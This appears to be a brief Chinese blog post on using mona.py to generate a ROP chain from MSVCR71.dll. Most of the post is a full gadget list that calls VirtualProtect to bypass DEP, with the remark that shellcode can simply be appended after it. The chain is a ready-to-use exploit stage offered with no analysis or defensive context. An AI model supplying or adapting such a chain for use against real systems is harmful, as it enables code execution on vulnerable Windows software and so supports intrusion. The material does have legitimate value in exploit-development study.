rop_gadgets使用方法

2024-03-29 08:48
文章标签 使用 方法 rop gadgets

本文主要是介绍rop_gadgets使用方法,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

利用mona.py可以生成

!mona rop -m msvcr71.dll -n

这部分gadget能够将后面的shellcode变成可执行的代码段!,后面直接跟shellcode就ok了

rop_gadgets =
[
    0x7c346c0a,    # POP EAX # RETN (MSVCR71.dll)
    0x7c37a140,    # Make EAX readable            
    0x7c37591f,    # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
    0x41414141,    # EBP (filler)
    0x7c346c0a,    # POP EAX # RETN (MSVCR71.dll)
    0x7c37a140,    # <- *&VirtualProtect()
    0x7c3530ea,    # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
    0x7c346c0b,    # Slide, so next gadget would write to correct stack location
    0x7c376069,    # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
    0x41414141,    # EDI (filler)
    0x41414141,    # will be patched at runtime (VP), then picked up into ESI
    0x41414141,    # EBX (filler)
    0x7c376402,    # POP EBP # RETN (msvcr71.dll)
    0x7c345c30,    # ptr to 'push esp #  ret ' (from MSVCR71.dll)
    0x7c346c0a,    # POP EAX # RETN (MSVCR71.dll)
    0xfffffdff,    # size 0x00000201 -> ebx, modify if needed
    0x7c351e05,    # NEG EAX # RETN (MSVCR71.dll)
    0x7c354901,    # POP EBX # RETN (MSVCR71.dll)
    0xffffffff,    # pop value into ebx
    0x7c345255,    # INC EBX # FPATAN # RETN (MSVCR71.dll)
    0x7c352174,    # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
    0x7c34d201,    # POP ECX # RETN (MSVCR71.dll)
    0x7c38b001,    # RW pointer (lpOldProtect) (-> ecx)
    0x7c34b8d7,    # POP EDI # RETN (MSVCR71.dll)
    0x7c34b8d8,    # ROP NOP (-> edi)
    0x7c344f87,    # POP EDX # RETN (MSVCR71.dll)
    0xffffffc0,    # value to negate, target value : 0x00000040, target: edx
    0x7c351eb1,    # NEG EDX # RETN (MSVCR71.dll)
    0x7c346c0a,    # POP EAX # RETN (MSVCR71.dll)
    0x90909090,    # NOPS (-> eax)
    0x7c378c81,    # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
    # rop chain generated with mona.py
].pack("V*")

这篇关于rop_gadgets使用方法的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/858155

相关文章

详解Vue如何使用xlsx库导出Excel文件

《详解Vue如何使用xlsx库导出Excel文件》第三方库xlsx提供了强大的功能来处理Excel文件,它可以简化导出Excel文件这个过程,本文将为大家详细介绍一下它的具体使用,需要的小伙伴可以了解... 目录1. 安装依赖2. 创建vue组件3. 解释代码在Vue.js项目中导出Excel文件,使用第三

Linux alias的三种使用场景方式

《Linuxalias的三种使用场景方式》文章介绍了Linux中`alias`命令的三种使用场景:临时别名、用户级别别名和系统级别别名,临时别名仅在当前终端有效,用户级别别名在当前用户下所有终端有效... 目录linux alias三种使用场景一次性适用于当前用户全局生效,所有用户都可调用删除总结Linux

Oracle查询优化之高效实现仅查询前10条记录的方法与实践

《Oracle查询优化之高效实现仅查询前10条记录的方法与实践》:本文主要介绍Oracle查询优化之高效实现仅查询前10条记录的相关资料,包括使用ROWNUM、ROW_NUMBER()函数、FET... 目录1. 使用 ROWNUM 查询2. 使用 ROW_NUMBER() 函数3. 使用 FETCH FI

java图像识别工具类(ImageRecognitionUtils)使用实例详解

《java图像识别工具类(ImageRecognitionUtils)使用实例详解》:本文主要介绍如何在Java中使用OpenCV进行图像识别,包括图像加载、预处理、分类、人脸检测和特征提取等步骤... 目录前言1. 图像识别的背景与作用2. 设计目标3. 项目依赖4. 设计与实现 ImageRecogni

Git中恢复已删除分支的几种方法

《Git中恢复已删除分支的几种方法》:本文主要介绍在Git中恢复已删除分支的几种方法,包括查找提交记录、恢复分支、推送恢复的分支等步骤,文中通过代码介绍的非常详细,需要的朋友可以参考下... 目录1. 恢复本地删除的分支场景方法2. 恢复远程删除的分支场景方法3. 恢复未推送的本地删除分支场景方法4. 恢复

Python将大量遥感数据的值缩放指定倍数的方法(推荐)

《Python将大量遥感数据的值缩放指定倍数的方法(推荐)》本文介绍基于Python中的gdal模块,批量读取大量多波段遥感影像文件,分别对各波段数据加以数值处理,并将所得处理后数据保存为新的遥感影像... 本文介绍基于python中的gdal模块,批量读取大量多波段遥感影像文件,分别对各波段数据加以数值处

python管理工具之conda安装部署及使用详解

《python管理工具之conda安装部署及使用详解》这篇文章详细介绍了如何安装和使用conda来管理Python环境,它涵盖了从安装部署、镜像源配置到具体的conda使用方法,包括创建、激活、安装包... 目录pytpshheraerUhon管理工具:conda部署+使用一、安装部署1、 下载2、 安装3

Mysql虚拟列的使用场景

《Mysql虚拟列的使用场景》MySQL虚拟列是一种在查询时动态生成的特殊列,它不占用存储空间,可以提高查询效率和数据处理便利性,本文给大家介绍Mysql虚拟列的相关知识,感兴趣的朋友一起看看吧... 目录1. 介绍mysql虚拟列1.1 定义和作用1.2 虚拟列与普通列的区别2. MySQL虚拟列的类型2

使用MongoDB进行数据存储的操作流程

《使用MongoDB进行数据存储的操作流程》在现代应用开发中,数据存储是一个至关重要的部分,随着数据量的增大和复杂性的增加,传统的关系型数据库有时难以应对高并发和大数据量的处理需求,MongoDB作为... 目录什么是MongoDB?MongoDB的优势使用MongoDB进行数据存储1. 安装MongoDB

关于@MapperScan和@ComponentScan的使用问题

《关于@MapperScan和@ComponentScan的使用问题》文章介绍了在使用`@MapperScan`和`@ComponentScan`时可能会遇到的包扫描冲突问题,并提供了解决方法,同时,... 目录@MapperScan和@ComponentScan的使用问题报错如下原因解决办法课外拓展总结@